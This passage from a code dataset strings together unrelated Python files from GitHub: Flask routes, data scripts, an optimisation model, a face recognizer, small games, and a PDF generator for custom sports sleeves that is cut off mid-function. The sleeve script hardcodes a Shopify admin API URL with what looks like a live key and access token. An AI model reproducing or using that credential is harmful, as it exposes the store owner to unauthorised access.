UID=current_user.id, QID=qid, Status=status, Option=selection\n        )\n\n    db.session.add(data)\n    db.session.commit()\n    return Response(status=204)\n\n\n@main.route(\"/mocktest\")\n@login_required\ndef mocktest():\n    return render_template(\"main/mocktest.html\", title=\"Mock Test\")\n\n\n@main.route(\"/mocktest/<level>\")\n@login_required\ndef mocktest_level(level):\n    questions = (\n        Questions.query.filter_by(Level=level) \n        .order_by(db.func.random())\n        .limit(10)\n        .all()\n    )\n    return render_template(\n        \"main/mocktest_questions.html\",\n        title=f\"Mock Test - {level}\",\n        questions=questions,\n        count=1,\n        len=len(questions),\n    )\n\n\n@main.route(\"/mock/<level>/<score>/<time>\")\n@login_required\ndef save_mocktest(level, score, time):\n    data = Mock(UID=current_user.id, Level=level, Score=score, Time=time)\n    db.session.add(data)\n    db.session.commit()\n    return Response(status=204)\n\n","repo_name":"faheempa/Projects","sub_path":"SkillSHARP_Aptitude_training_system/project/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17610807305","text":"import numpy as np\nimport pandas as pd\nimport sqlite3 as db\nfrom lsst.sims.utils import angularSeparation\nfrom astropy.coordinates import get_sun\nfrom astropy.time import Time\n\ndef convert_schema(filename, fileout):\n\n\n    remap_dict 
={'RA':'fieldRA', 'dec':'fieldDec', 'mjd':'observationStartMJD', 'exptime':'visitExposureTime', \n 'filter':'filter', 'rotSkyPos':'rotSkyPos', 'nexp':'numExposures',\n 'airmass':'airmass', 'FWHMeff':'seeingFwhmEff', 'FWHM_geometric':'seeingFwhmGeom',\n 'skybrightness':'skyBrightness', 'night': 'night', 'slewtime':'slewTime', 'fivesigmadepth':'fiveSigmaDepth',\n 'alt':'altitude', 'az':'azimuth', 'clouds':'clouds', 'moonAlt':'moonAlt', 'sunAlt':'sunAlt', 'note':'note', \n 'field_id':'fieldId', 'survey_id':'proposalId', 'block_id':'block_id'}\n\n\n conn = db.connect(filename)\n df = pd.read_sql('select * from observations;', conn)\n df = df.rename(index=str, columns=remap_dict)\n # Kludge on the visitTime\n df['visitTime'] = 2.*df['numExposures'].values + df['visitExposureTime'].values\n # Dummy column\n df['slewDistance'] = 0.*df['numExposures'].values\n\n # Add the solar elongation in there\n times = Time(df['observationStartMJD'].values, format='mjd')\n suns = get_sun(times)\n\n solarElong = angularSeparation(suns.ra.value, suns.dec.value, df['fieldRA'].values, df['fieldDec'].values)\n\n df['solarElong'] = solarElong\n\n conn.close()\n conn = db.connect(fileout)\n df.to_sql('SummaryAllProps', conn, index=False, if_exists='replace')\n\n\nif __name__ == '__main__':\n\n files = {'rolling/rolling_10yrs.db':'rolling/rolling_10yrs_opsim.db',\n 'roll_mix/rolling_mix_10yrs.db': 'roll_mix/rolling_mix_10yrs_opsim.db'}\n\n for infile in files:\n convert_schema(infile, files[infile])\n\n","repo_name":"yoachim/SLAIR_runs","sub_path":"runs/convert_schema.py","file_name":"convert_schema.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20282168186","text":"\"\"\"\nTest object detection for snooker/pool table and balls with Google's open images datasets\n\"\"\"\n\nimport fiftyone as fo\n\n\ndef pull_store_datasets(\n splits: list[str], pull_classes: list[str], export_classes: list[str]\n) -> None:\n \"\"\"\n Pulls and stores images from Google's open images api.\n\n :param splits: Splits of images to pull. [\"validation\", \"train\", \"test\"]\n :param pull_classes: List of class names that must be in the images.\n :param export_classes: List of class names that are in the exported images. Any other labels in the images will be\n ignored.\n\n :Examples:\n Pull all splits from open images with the class of Billiard Table\n >>> pull_store_datasets(\n >>> [\"validation\", \"train\", \"test\"], [\"Billiard table\"], [\"Ball\", \"Billiard table\"]\n >>> )\n \"\"\"\n for split in splits:\n print(f\"Pulling {split} dataset...\")\n dataset = fo.zoo.load_zoo_dataset(\n \"open-images-v6\",\n split=split,\n label_types=[\"detections\"],\n classes=pull_classes,\n )\n print(f\"Computing {split} dataset metadata...\")\n dataset.compute_metadata()\n # Not sure if this is needed\n # print(f\"Evaluating {split} dataset detections...\")\n # dataset.evaluate_detections(\n # \"predictions\",\n # gt_field=\"detections\",\n # method=\"open-images\",\n # classes=export_classes,\n # use_boxes=True,\n # )\n print(f\"Exporting {split} dataset...\")\n dataset.export(\n export_dir=\"datasets/snooker_vision\",\n dataset_type=fo.types.YOLOv5Dataset,\n split=split,\n classes=export_classes,\n )\n print(f\"{split} dataset complete.\")\n\n\ndef load_dataset(dataset_dir: str, name: str):\n \"\"\"\n Loads a dataset from disk. There are two ways to pull the dataset. 
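The convert_schema routine above is a rename-columns-and-rewrite pass over a SQLite table. Below is a self-contained sketch of the same pattern with throwaway in-memory databases and a two-column example mapping; the mapping shown is an illustrative subset, not the full remap_dict.

import sqlite3
import pandas as pd

remap = {'RA': 'fieldRA', 'mjd': 'observationStartMJD'}  # example subset only

src = sqlite3.connect(':memory:')
pd.DataFrame({'RA': [10.0, 20.0], 'mjd': [59000.5, 59001.5]}).to_sql(
    'observations', src, index=False)

df = pd.read_sql('select * from observations;', src)
df = df.rename(columns=remap)   # apply the schema mapping
df['visitTime'] = 30.0          # derived/dummy column, as in the original

dst = sqlite3.connect(':memory:')
df.to_sql('SummaryAllProps', dst, index=False, if_exists='replace')
print(pd.read_sql('select * from SummaryAllProps;', dst))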
If the dataset is in fo.list_datasets() then\n specify the name and use fo.load_dataset(). Else, specify the path, name and use fo.Dataset.from_dir().\n\n :param dataset_dir: Path to the dataset\n :param name: Name of the dataset\n \"\"\"\n return fo.Dataset.from_dir(\n dataset_dir=dataset_dir, dataset_type=fo.types.YOLOv5Dataset, name=name\n )\n # If the dataset is in fo.list_datasets(), then use this command to load dataset\n # return fo.load_dataset(name)\n\n\n# validation_data = load_dataset(\"datasets/snooker_vision/\", \"validation\")\n","repo_name":"morge2002/snooker-vision","sub_path":"object_detection_model/images/get_images.py","file_name":"get_images.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7177104199","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def invertTree(self, root: TreeNode) -> TreeNode:\n\n if(root == None):\n return\n else:\n self.invertTree(root.left)\n self.invertTree(root.right)\n\n temp = root.left\n root.left = root.right\n root.right = temp\n\n return root\n\n def InOrder(self,root):\n if root == None:\n return\n else:\n self.InOrder(root.left)\n print(root.val)\n self.InOrder(root.right)\n # return root\n\nif __name__ == '__main__':\n\n node=TreeNode(4)\n node.left = TreeNode(2)\n node.left.left = TreeNode(1)\n node.left.right = TreeNode(3)\n node.right = TreeNode(7)\n node.right.left = TreeNode(6)\n node.right.right = TreeNode(9)\n\n invertTreeSOl = Solution()\n invertTreeSOl.invertTree(node)\n invertTreeSOl.InOrder(node)","repo_name":"mmkvdev/leetcode","sub_path":"June/Week-1/Day1/Submissions/invertBinaryTree.py","file_name":"invertBinaryTree.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27987557564","text":"\"\"\" Utility to check if results have changed in foreign APIs. \"\"\"\n\nimport glob\nimport datetime\nfrom os.path import realpath, join, dirname, exists, expanduser\nimport hashlib\nimport pickle\n\nimport pandas as pd\nimport numpy as np\n\nfrom pliers.stimuli import load_stims\nfrom pliers.transformers import get_transformer\n\n\ndef hash_data(data, blocksize=65536):\n \"\"\"\" Hashes list of data, strings or data \"\"\"\n data = pickle.dumps(data)\n\n hasher = hashlib.sha1()\n hasher.update(data)\n\n return hasher.hexdigest()\n\n\ndef check_updates(transformers, datastore=None, stimuli=None):\n \"\"\" Run transformers through a battery of stimuli, and check if output has\n changed. Store results in csv file for comparison.\n\n Args:\n transformers (list): A list of tuples of transformer names and\n dictionary of parameters to instantiate with (or empty dict).\n datastore (str): Filepath of CSV file with results. Stored in home dir\n by default.\n stimuli (list): List of stimuli file paths to extract from. 
If None,\n            use test data.\n    \"\"\"\n    # Find datastore file\n    datastore = datastore or expanduser('~/.pliers_updates')\n    prior_data = pd.read_csv(datastore) if exists(datastore) else None\n\n    # Load stimuli\n    stimuli = stimuli or glob.glob(\n        join(dirname(realpath(__file__)), '../tests/data/image/CC0/*'))\n    stimuli = load_stims(stimuli)\n\n    # Get transformers\n    loaded_transformers = {get_transformer(name, **params): (name, params)\n                           for name, params in transformers}\n\n    # Transform stimuli\n    results = pd.DataFrame({'time_extracted': [datetime.datetime.now()]})\n    for trans in loaded_transformers.keys():\n        for stim in stimuli:\n            if trans._stim_matches_input_types(stim):\n                res = trans.transform(stim)\n\n                try: # Add iterable\n                    res = [getattr(res, '_data', res.data) for r in res]\n                except TypeError:\n                    res = getattr(res, '_data', res.data)\n\n                res = hash_data(res)\n\n                results[\"{}.{}\".format(trans.__hash__(), stim.name)] = [res]\n\n    # Check for mismatches\n    mismatches = []\n    if prior_data is not None:\n        last = prior_data[\n            prior_data.time_extracted == prior_data.time_extracted.max()]. \\\n            iloc[0].drop('time_extracted')\n\n        for label, value in results.iteritems():\n            old = last.get(label)\n            new = value.values[0]\n\n            if old is not None:\n                if isinstance(new, str):\n                    if new != old:\n                        mismatches.append(label)\n                elif not np.isclose(old, new):\n                    mismatches.append(label)\n\n        results = prior_data.append(results)\n\n    results.to_csv(datastore, index=False)\n\n    # Get corresponding transformer name and parameters\n    def get_trans(hash_tr):\n        for obj, attr in loaded_transformers.items():\n            if str(obj.__hash__()) == hash_tr:\n                return attr\n\n    delta_t = {m.split('.')[0] for m in mismatches}\n    delta_t = [get_trans(dt) for dt in delta_t]\n\n    return {'transformers': delta_t, 'mismatches': mismatches}\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/utils/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"71915843368","text":"########\n# author: danielle8farias@gmail.com \n# repository: https://github.com/danielle8farias\n# Description: program returns the status code of a website provided by the user\n########\n\nimport requests\n\ndef ver_status_site(site):\n    r = requests.get(site)\n    return r.status_code\n\n\nif __name__ == '__main__':\n    # function calls\n    print(ver_status_site('https://danielle8farias.github.io/'))\n    print(ver_status_site('https://danielle8farias.github.io/blog/'))\n","repo_name":"danielle8farias-zz/hello-world-python3","sub_path":"exercicio_py/ex0034_http_status_codes/main_v0.py","file_name":"main_v0.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31923958298","text":"from gurobipy import *\n\ntry:\n    center = ['plano', 'nashville', 'flagstaff', 'springfield', 'boulder']\n    zone = ['la', 'chicago', 'columbus', 'atlanta', 'newark', 'kansas', 'denver', 'dallas']\n\n    # data\n    network, cost = multidict({\n        ('plano', 'la'): 70,\n        ('plano', 'chicago'): 47,\n        ('plano', 'columbus'): 22,\n        ('plano', 'atlanta'): 53,\n        ('plano', 'newark'): 98,\n        ('plano', 'kansas'): 21,\n        ('plano', 'denver'): 27,\n        ('plano', 'dallas'): 13,\n\n        ('nashville', 'la'): 75,\n        ('nashville', 'chicago'): 38,\n        ('nashville', 'columbus'): 19,\n        ('nashville', 'atlanta'): 58,\n        ('nashville', 'newark'): 90,\n        ('nashville', 'kansas'): 34,\n        ('nashville', 'denver'): 40,\n        
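The updater module above fingerprints extractor output by pickling it and hashing the bytes with SHA-1. A stand-alone illustration of that idea follows, with one caveat worth stating as an assumption: pickle bytes are only stable within a single Python/protocol version, so these digests suit single-environment change detection like the updater's.

import hashlib
import pickle

def fingerprint(obj) -> str:
    # Serialize the object, then hash the resulting bytes.
    hasher = hashlib.sha1()
    hasher.update(pickle.dumps(obj))
    return hasher.hexdigest()

a = fingerprint([1, 2, {'x': 3.0}])
b = fingerprint([1, 2, {'x': 3.0}])
c = fingerprint([1, 2, {'x': 3.5}])
print(a == b, a == c)  # True False -> equal objects match, any change shows up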
('nashville', 'dallas'): 26,\n\n        ('flagstaff', 'la'): 15,\n        ('flagstaff', 'chicago'): 78,\n        ('flagstaff', 'columbus'): 37,\n        ('flagstaff', 'atlanta'): 82,\n        ('flagstaff', 'newark'): 111,\n        ('flagstaff', 'kansas'): 40,\n        ('flagstaff', 'denver'): 29,\n        ('flagstaff', 'dallas'): 32,\n\n        ('springfield', 'la'): 60,\n        ('springfield', 'chicago'): 23,\n        ('springfield', 'columbus'): 8,\n        ('springfield', 'atlanta'): 39,\n        ('springfield', 'newark'): 82,\n        ('springfield', 'kansas'): 36,\n        ('springfield', 'denver'): 32,\n        ('springfield', 'dallas'): 45,\n\n        ('boulder', 'la'): 45,\n        ('boulder', 'chicago'): 40,\n        ('boulder', 'columbus'): 29,\n        ('boulder', 'atlanta'): 75,\n        ('boulder', 'newark'): 86,\n        ('boulder', 'kansas'): 25,\n        ('boulder', 'denver'): 11,\n        ('boulder', 'dallas'): 37,\n\n    })\n\n    m = Model('assignment')\n\n    # Add variables\n    x = m.addVars(network, name='network diagram')\n\n    # center constraints\n    center = m.addConstrs((x.sum(c, '*') <= 3 for c in center), 'center')\n\n    # zone constraints\n    zone = m.addConstrs((x.sum('*', z) == 1 for z in zone), 'zone')\n\n    # Set objective function\n    m.setObjective(x.prod(cost), GRB.MINIMIZE)\n\n    # Solve model\n    m.optimize()\n\n    for v in m.getVars():\n        print('%s %g' % (v.varName, v.x))\n\n    for v in m.getVars():\n        print('%s %g' % (v.varName, v.x))\n    print(\"Final answer is in thousands\")\n\n    print('obj: %g' % m.objVal)\n\n\n\nexcept Exception as e:\n    exc_type, exc_obj, exc_tb = sys.exc_info()\n    fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n    print(exc_type, fname, exc_tb.tb_lineno)\n","repo_name":"abhishekphadke/Optimization-using-Gurobi","sub_path":"Basic/03 Assignment problem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70042911210","text":"import click\nfrom nhs.searchengine import search\n\n\n@click.command()\n@click.argument('-operator', type=click.Choice(['AND', 'OR']), default='OR')\n@click.argument('query')\n@click.option('--datafile', default=\"./data/hscic-news\", type=click.File())\ndef cli(query, _operator, datafile=None):\n    \"\"\"Will search the database.\n    If operator is == OR (default) then entries must match at least one of the terms provided in the QUERY parameter.\n    If operator is == AND then entries must match all of the terms provided in the QUERY parameter.\"\"\"\n\n    # Formatting results\n    results = ','.join(search(datafile, query, _operator))\n\n    # returning results\n    click.echo(results)\n\n\ndef main(): # pragma: no cover\n    cli()\n","repo_name":"GigiusB/coding_test_1","sub_path":"src/nhs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19405395074","text":"#! /usr/bin/python\n# **************************************************************************** #\n#                                                              __               #\n#    rock_paper_scissors.py                                   / _)              #\n#                                                     _/\\/\\/\\_/ /               #\n#    By: pedro_mota                                 _|         /                #\n#    Github: github.com/peterbikes                _|  (  | (  |                 #\n#    Linkedin: linkedin.com/in/pedrosmpm/        /__.-'|_|--|_|                 #\n#                                                                               #\n# **************************************************************************** #\n\nimport random\nimport time\n\ndef lets_game(pc, player):\n    print(\"🤜...rock...🤛\", end=\"\\r\")\n    time.sleep(1)\n    print(\"🤜...paper...🤛\", end=\"\\r\")\n    time.sleep(1)\n    print(\"🤜...scissors...🤛\", end = \"\\n\")\n    time.sleep(1)\n    if(pc == player):\n        print(\"🪞 DRAW! 🪞\")\n    if(pc == 'R' and player == 'P'):\n        print(\"🧻 PLAYER WON! 
🪨\")\n if(pc == 'R' and player == 'S'):\n print(\"✂️ COMPUTER WON :( 🪨\")\n if(pc == 'P' and player == 'R'):\n print(\"🪨 COMPUTER WON :( 🧻\")\n if(pc == 'P' and player == 'S'):\n print(\"✂️ PLAYER WON! 🧻\")\n if(pc == 'S' and player == 'P'):\n print(\"🧻 COMPUTER WON :( ✂️\")\n if(pc == 'S' and player == 'R'):\n print(\"🪨 PLAYER WON! ✂️\")\n\n\npc_choice = random.randint(1, 3)\nif(pc_choice == 1):\n pc_choice = 'R'\nif(pc_choice == 2):\n pc_choice = 'P'\nif(pc_choice == 3):\n pc_choice = 'S'\n\nwhile 1:\n player = input(\"(R)ock, (P)aper, (S)cissors? \")\n player = player.capitalize()\n if(player != 'R' and player != 'P' and player != 'S'):\n print(\"invalid choice, try again\")\n else:\n break\n\nlets_game(pc_choice, player)\n","repo_name":"peterbikes/100_Python_Projects","sub_path":"Rock Paper Scissors/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13882311176","text":"import numpy as np\nimport imutils\nimport pickle\nimport time\nimport cv2\n\nembeddingModel = \"openface_nn4.small2.v1.t7\"\n\nembeddingFile = \"output/embeddings.pickle\"\nrecognizerFile = \"output/recognizer.pickle\"\nlabelEncFile = \"output/le.pickle\"\nconf = 0.5\n\nprint(\"Loading face detector...\")\nprototxt = \"model/deploy.prototxt\"\nmodel = \"model/res10_300x300_ssd_iter_140000.caffemodel\"\ndetector = cv2.dnn.readNetFromCaffe(prototxt, model)\n\nprint(\"Loading face recognizer...\")\nembedder = cv2.dnn.readNetFromTorch(embeddingModel)\n\nrecognizer = pickle.loads(open(recognizerFile, \"rb\").read())\nle = pickle.loads(open(labelEncFile, \"rb\").read())\n\nbox = []\nprint(\"Starting video stream...\")\ncam = cv2.VideoCapture(0)\ntime.sleep(2.0)\n\nwhile True:\n _, frame = cam.read()\n frame = imutils.resize(frame, width=600)\n (h, w) = frame.shape[:2]\n imageBlob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0, (300, 300),(104.0, 177.0, 123.0), swapRB=False, crop=False)\n\n detector.setInput(imageBlob)\n detections = detector.forward()\n\n for i in range(0, detections.shape[2]):\n\n confidence = detections[0, 0, i, 2]\n\n if confidence > conf:\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n face = frame[startY:endY, startX:endX]\n (fH, fW) = face.shape[:2]\n\n if fW < 20 or fH < 20:\n continue\n\n faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255, (96, 96), (0, 0, 0), swapRB=True, crop=False)\n embedder.setInput(faceBlob)\n vec = embedder.forward()\n\n preds = recognizer.predict_proba(vec)[0]\n j = np.argmax(preds)\n proba = preds[j]\n name = le.classes_[j]\n text = \"{} : {:.2f}%\".format(name, proba * 100)\n y = startY - 10 if startY - 10 > 10 else startY + 10\n cv2.rectangle(frame, (startX, startY), (endX, endY),(0, 0, 255), 2)\n cv2.putText(frame, text, (startX, y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 255, 0), 2)\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n if key == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()","repo_name":"PGPradhan/Attendance-Project","sub_path":"4_recognizingPerson.py","file_name":"4_recognizingPerson.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6025719749","text":"\"\"\"\nIf a box contains twenty-one coloured discs, composed of fifteen blue discs and six red discs, and two discs were taken at random, it can be 
seen that the probability of taking two blue discs, P(BB) = (15/21)×(14/20) = 1/2.\n\nThe next such arrangement, for which there is exactly 50% chance of taking two blue discs at random, is a box containing eighty-five blue discs and thirty-five red discs.\n\nBy finding the first arrangement to contain over 10^12 = 1,000,000,000,000 discs in total, determine the number of blue discs that the box would contain.\n\"\"\"\n\nimport timeit\n\nstart = timeit.default_timer()\n\n\n\"\"\"\nFrom OEIS A011900: Solutions to b(b-1) = 2a(a-1) in natural numbers\n\"\"\"\ndef a(n):\n    if n == 0:\n        return 1\n    if n == 1:\n        return 3\n\n    return 6 * a(n-1) - a(n-2) - 2\n\nn = 2\n\nwhile True:\n    if 2 * a(n) > 10**12:\n        break\n    n += 1\n\nprint(a(n))\n\nstop = timeit.default_timer()\nprint('Runtime:', stop - start)\n\n# Answer: 756872327473","repo_name":"tomlinsonk/euler","sub_path":"problem100/problem100.py","file_name":"problem100.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26309288085","text":"from reportlab.pdfgen import canvas\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nimport requests\nimport tkinter as tk\nfrom tkinter import *\nimport io\n\n# defining the gui\nroot = tk.Tk()\nroot.title('Custom Sports Sleeves')\nroot.geometry('700x700')\n\nurl = 'https://7e9f940f3dbb4372bc2c756d2617ab8d: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@lovcompression.myshopify.com/admin/api/2022-04/'\n\ndef get_date():\n    get_date.date_1 = int(entry_date.get())\n    get_date.orders = get_orders()\n\ndef get_orders():\n    endpoint = f'orders.json?limit=250;created_at_max=2022-08-{get_date.date_1}T23:59:59;status=any'\n    r = requests.get(url + endpoint)\n    return r.json()\n\n\n# Importing Fonts\npdfmetrics.registerFont(TTFont('Marker', 'Bangers.ttf'))\npdfmetrics.registerFont(TTFont('Tough', 'BlackOpsOne-Regular.ttf'))\npdfmetrics.registerFont(TTFont('College', 'college.ttf'))\npdfmetrics.registerFont(TTFont('Iceberg', 'Iceberg.ttf'))\npdfmetrics.registerFont(TTFont('Roboto', 'Roboto-Bold.ttf'))\npdfmetrics.registerFont(TTFont('Jersey', 'sportsjersey.ttf'))\npdfmetrics.registerFont(TTFont('Asos', 'full_Pack_2025.ttf'))\npdfmetrics.registerFont(TTFont('Adventure', 'SF Fedora.ttf'))\npdfmetrics.registerFont(TTFont('Sporty', 'Calibri Bold.TTF'))\npdfmetrics.registerFont(TTFont('Burny', 'Burny.ttf'))\n\ndef namePDF(pdfName):\n    namePDF.pdf = canvas.Canvas(pdfName + '.pdf')\n    namePDF.numberEntries = 0\n    namePDF.pdf.setPageSize((648,1286))\n\ndef headbandFontSize (txt, font1):\n    txtLength = len(txt)\n    print(txtLength)\n    if font1 == 'Bangers':\n        if txtLength <= 5:\n            namePDF.pdf.setFont(font1, 190)\n            namePDF.pdf.scale(1, 1)\n        elif 5 < txtLength <= 8:\n            namePDF.pdf.setFont(font1, 190)\n            namePDF.pdf.scale(0.9, 1)\n        elif 8 < txtLength <= 10:\n            namePDF.pdf.setFont(font1, 185)\n            namePDF.pdf.scale(0.85, 1)\n    elif font1 == 'Tough':\n        if txtLength <= 5:\n            namePDF.pdf.setFont(font1, 180)\n            namePDF.pdf.scale(0.83, 1)\n        elif 5 < txtLength <= 8:\n            namePDF.pdf.setFont(font1, 185)\n            namePDF.pdf.scale(0.6, 1)\n        elif 8 < txtLength <= 10:\n            namePDF.pdf.setFont(font1, 170)\n            namePDF.pdf.scale(0.5, 1)\n    elif font1 == 'College':\n        if txtLength <= 5:\n            namePDF.pdf.setFont(font1, 185)\n            namePDF.pdf.scale(1.1, 1)\n        elif 5 < txtLength <= 8:\n            namePDF.pdf.setFont(font1, 175)\n            namePDF.pdf.scale(0.8, 1)\n        elif 8 < txtLength <= 10:\n            namePDF.pdf.setFont(font1, 170)\n            namePDF.pdf.scale(0.7, 1)\n    elif font1 == 'Iceberg':\n        if 
txtLength <= 5:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(0.9, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.7, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.5, 1)\n elif font1 == 'Roboto':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 190)\n namePDF.pdf.scale(0.9, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 180)\n namePDF.pdf.scale(0.7, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.55, 1)\n elif font1 == 'Sports Jersey':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 185)\n namePDF.pdf.scale(1.1, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.9, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 170)\n namePDF.pdf.scale(0.68, 1)\n elif font1 == 'Asos':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 170)\n namePDF.pdf.scale(.70, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 165)\n namePDF.pdf.scale(.50,1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 160)\n namePDF.pdf.scale(.35, 1)\n\n\ndef numberFontSize (num, font):\n numLength = len(num)\n if font == 'Jersey':\n if numLength == 1:\n namePDF.pdf.scale(1, 1)\n namePDF.pdf.setFont(font, 140)\n elif numLength == 2:\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'College':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Marker':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Tough':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Iceberg':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Roboto':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Asos':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Adventure':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Sporty':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n\n\ndef find_order(specific_order):\n x = 0\n while specific_order.upper() != \"QUIT\":\n if int(specific_order) == int(get_date.orders['orders'][x]['order_number']):\n product_id = int(get_date.orders['orders'][x]['line_items'][get_specificItem.number][\"product_id\"])\n print(product_id)\n # Custom Number Arm Sleeve\n if product_id == 626889097271:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n number = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n print(f'''\n {name}\n {number}\n {font}\n {txt_color}\n {size}\n ''')\n namePDF.pdf.saveState()\n numberFontSize(number, font)\n namePDF.pdf.drawString(20, 1150 - (110*int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n break\n # Customized Arm Sleeve\n elif product_id == 10834995656:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n text = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = 
(get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n txt_length = len(text)\n print(f'''\n {name}\n {text}\n {font}\n {txt_color}\n {size}\n {txt_length}\n ''')\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110*int(namePDF.numberEntries)), text)\n namePDF.pdf.restoreState()\n break\n # Custom Text Number Arm Sleeve\n elif product_id == 1421879279671:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n number = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n number_font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n number_clr = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n txt_font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][4]['value'])\n txt_clr = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][5]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][6]['value'])\n def numOrTxt(answer):\n if answer.upper() == 'BOTH':\n # Number\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(number_font, 125)\n namePDF.pdf.drawString(700, 1150 - (110 * int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n # Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(txt_font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), txt)\n namePDF.pdf.restoreState()\n elif answer.upper() == 'NUMBER':\n #Number\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(number_font, 125)\n namePDF.pdf.drawString(700, 1150 - (110 * int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n elif answer.upper() == 'TEXT':\n # Text\n 